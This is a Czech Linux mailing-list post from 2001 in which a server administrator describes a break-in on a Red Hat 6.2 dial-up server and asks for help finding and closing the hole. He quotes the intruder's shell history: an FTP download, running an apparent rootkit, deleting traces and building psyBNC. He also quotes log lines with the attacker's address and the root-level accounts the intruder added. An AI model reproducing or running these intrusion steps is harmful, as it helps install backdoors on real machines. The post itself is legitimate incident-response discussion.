hacknuto: user cgi s pravy roota

Libor msqqq na volny.cz
Úterý Březen 27 23:40:26 CEST 2001


a to se mi stalo na serveru (dial-up) se standartním RH 6.2.CZ
Přišel jsem na to jen díky tomu, že "se" mi zablokovala na serveru
všechna konta.
Našel jsem v /etc/passwd a /etc/shadow appendnuté řádky s userem
cgi s UID a GID 0 a nastavený aktívní password u uživatele operator.
/etc/group se zdá být nedotčen.
V /home/cgi/ jsem našel (naštěstí) následující .bash_history :

ftp ftp.tripod.com
ls
tar -zxvf ark-1.0.tar.gz
rm -rf ark-1.0.tar.gz
cd ark-1.0/
./ark muiegrasa
cd
cd /root
rm -rf ark-1.0/
tar -zxvf psyBNC2.2.1.tar.gz
cd psybnc/
make

Zná někdo volané programy? Tam se zřejmě dělo velice moc.
Vypadá to na kompletní přeinstalaci.
Ten user cgi bude zřejmě matoucí jméno, bohužel httpd běžel defaultně
naistalován. Ale v logu nebylo nic.
Taktéž telnet byl otevřen...
Může mě někdo nakopnout jak se tam bad boy mohl dostat. 
Jde o maškarádující dial-up server kde jsou jenom učty uživatelů,
kreří spouštějí pppd. Jinak tam běží mgetty+sedfax. A taky swat byl
otevřen, ale samba ještě nenakonfigurována.
Kromě toho vidím v /var/log/messages
PAMpwdb[...] (su) session opened for user news (uid=0), což taky 
určitě není v pořádku.
Pak je ještě záznam v /var/log/secure.1 
Mar 25 01.57.59 in.telnetd[...] connect from 212.93.155.232
Mar 25 01.58.10 login LOGIN ON 1 BY operator FROM\
212.93.155.232.catv.rdsor.ro

Je to teda smršť - spíš bych prosil o radu, kam se podívat, co hledat
jak odhalit slabinu, a jak ji zalepit.
Jak zjistit jestli se nedostal na další mašiny v síti (.rhost) tam nejsou.

Díky

Libor



Další informace o konferenci Linux